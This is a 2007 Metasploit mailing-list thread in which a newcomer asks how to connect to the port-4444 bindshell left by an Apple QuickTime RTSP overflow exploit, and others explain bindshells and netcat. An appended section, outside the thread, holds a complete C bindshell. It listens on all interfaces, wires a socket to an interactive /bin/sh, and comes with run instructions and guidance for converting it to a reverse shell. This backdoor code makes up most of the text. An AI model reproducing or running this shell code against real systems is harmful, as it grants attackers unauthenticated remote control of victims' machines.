[framework] question on Apple Quicktime RTSP bind/attach process
Jeffs
jeffs at speakeasy.net
Tue Nov 27 15:54:08 CST 2007
Thanks for making that clear.
base wrote:
> The payload in question is a standard bindshell, meaning it listens on
> the victim's machine for an incoming connection. Only the initial
> exploitation process involves the target connecting to the host machine.
>
> If these facts were not terribly obvious to you, you've gotten far
> ahead of yourself and should read up on the basics as suggested
> earlier in this thread.
> You will find a wealth of information from older projects and papers
> detailing basic shellcode and exploitation.
> Aleph1's paper, 'Smashing the Stack for Fun and Profit', is still helpful
> for a beginner even though it is over a decade old.
>
> Jeffs wrote:
>> Are you sure the payload opens a listening socket on the *victim's*
>> machine? The way I understand that sploit to work is it allows the
>> attacker to listen for a connection whilst at the same time listening
>> on another port (4444) for a connection from the victim's machine.
>> The sploit creates an RTSP server that waits for a connection, then
>> sends code to the victim having them contact the attacker's machine.
>> Kurt Grutzmacher wrote:
>>> You should learn more about buffer overflows before you get too deep
>>> into any code. There are a ton of resources on the web that a quick
>>> Google search will direct you towards.
>>>
>>> But to quickly answer your question, the payload shellcode provides the
>>> instructions to open a listener socket on port 4444 on the victim's
>>> machine that you connect to with netcat. It's assembly code because the
>>> overflow allowed us to execute it.
>>>
>>> The script you linked to just uses the shellcode generated by
>>> metasploit.
>>> It doesn't integrate within the framework. An exploit has been written
>>> and is available in the current svn trunk.
>>>
>>> On Tue, Nov 27, 2007 at 09:20:31AM -0500, Jeffs wrote:
>>>
>>>> Regarding
>>>>
>>>> http://www.securityfocus.com/data/vulnerabilities/exploits/26549-uni.py
>>>>
>>>> which is the Apple QuickTime RTSP Response Header Remote Stack
>>>> Based Buffer Overflow Vulnerability -- as a newbie I have a simple
>>>> question.
>>>>
>>>> I understand the code behind the exploit in theory, but am confused
>>>> about how one would successfully attach or bind to the process that
>>>> is sitting at port 4444 (assuming you used that value as per the
>>>> code) to get the reverse shell? Netcat wouldn't do it because
>>>> there is no netcat process being sent to the attacking machine. If
>>>> you could integrate it into metasploit then I understand you would
>>>> have a "session". But this is a python script. How does one
>>>> integrate it into metasploit if at all. If not, how does the
>>>> attacking machine attach to the bind process coming in on port 4444?
>>>>
>>>> Thank you from a newbie
>>>>
More information about the framework mailing list
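As an added example that is not part of the thread, of the Metasploit module, or of the linked Python script, the C program below spells out in ordinary socket calls what Kurt and base describe: the bindshell payload performs socket/bind/listen/accept on the victim, wires the accepted connection to stdin/stdout/stderr, and execs /bin/sh; the attacker's "attach" step is nothing more than netcat doing a TCP connect to that port. Function names are this example's own; port 4444 is the thread's value, and the loopback self-test uses an ephemeral port (0) so it can run anywhere without spawning a shell.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Added example, not from the thread or the linked exploit: the syscall
 * sequence a bindshell payload performs on the victim, plus the connect
 * that `nc victim 4444` performs on the attacker's side. */
#define BINDSHELL_PORT 4444   /* the port used in the thread */

/* Victim, step 1: socket() + bind() + listen() on every interface.
 * Port 0 lets the kernel choose a free port (used by the self-test).
 * Returns the listening fd, or -1 on failure. */
int bindshell_listen(uint16_t port)
{
    int s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
        return -1;
    int one = 1;
    setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one);
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_ANY);   /* 0.0.0.0: reachable from outside */
    sa.sin_port = htons(port);
    if (bind(s, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(s, 1) < 0) {
        close(s);
        return -1;
    }
    return s;
}

/* Port the listener actually got (matters when 0 was requested); 0 on error. */
uint16_t bound_port(int listen_fd)
{
    struct sockaddr_in sa;
    socklen_t len = sizeof sa;
    if (getsockname(listen_fd, (struct sockaddr *)&sa, &len) < 0)
        return 0;
    return ntohs(sa.sin_port);
}

/* Victim, step 2: block until a peer connects. The payload neither knows
 * nor cares that the peer is netcat; any TCP client will do. */
int bindshell_accept(int listen_fd)
{
    return accept(listen_fd, NULL, NULL);
}

/* Victim, step 3: point stdin/stdout/stderr at the connection and replace
 * the process with /bin/sh, so bytes from the peer become shell input and
 * shell output flows back over the socket. Returns only on failure. */
int bindshell_spawn(int client_fd)
{
    if (dup2(client_fd, 0) < 0 || dup2(client_fd, 1) < 0 || dup2(client_fd, 2) < 0)
        return -1;
    char sh[] = "/bin/sh", dash_i[] = "-i";
    char *argv[] = { sh, dash_i, NULL };
    char *envp[] = { NULL };
    execve(sh, argv, envp);
    return -1;
}

/* Attacker: everything `nc victim 4444` does before you start typing,
 * i.e. a plain TCP connect. Returns the connected fd, or -1. */
int attacker_connect(const char *ip, uint16_t port)
{
    int s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
        return -1;
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    if (inet_pton(AF_INET, ip, &sa.sin_addr) != 1 ||
        connect(s, (struct sockaddr *)&sa, sizeof sa) < 0) {
        close(s);
        return -1;
    }
    return s;
}

/* Loopback self-test of the attach step, without spawning a shell: listener
 * on an ephemeral port, attacker connects, one line crosses the socket.
 * Returns the byte count the victim side read, or -1 on any failure. */
int bindshell_roundtrip(const char *line)
{
    int l = bindshell_listen(0);
    if (l < 0)
        return -1;
    int a = attacker_connect("127.0.0.1", bound_port(l));
    int c = a < 0 ? -1 : bindshell_accept(l);
    char buf[64];
    ssize_t n = -1;
    if (c >= 0 && write(a, line, strlen(line)) == (ssize_t)strlen(line))
        n = read(c, buf, sizeof buf);
    if (n > 0 && memcmp(buf, line, (size_t)n) != 0)
        n = -1;
    if (c >= 0) close(c);
    if (a >= 0) close(a);
    close(l);
    return (int)n;
}

int main(void)
{
    int l = bindshell_listen(BINDSHELL_PORT);
    if (l < 0) {
        perror("bindshell_listen");
        return 1;
    }
    fprintf(stderr, "listening on 0.0.0.0:%u; attacker runs: nc <victim> %u\n",
            bound_port(l), BINDSHELL_PORT);
    int c = bindshell_accept(l);
    if (c < 0)
        return 1;
    close(l);
    bindshell_spawn(c);   /* does not return on success */
    return 1;
}
```

Run the binary on a test host and `nc <host> 4444` from another: the shell prompt appears on the netcat side, which is the "session" Jeffs was asking about. A reverse shell, the variant Jeffs had in mind, simply swaps the roles: the attacker's side calls bindshell_listen() and waits, and the victim's payload calls attacker_connect() back to the attacker's port and then bindshell_spawn() on the resulting fd; the syscalls are the same, only the direction of the TCP connect changes.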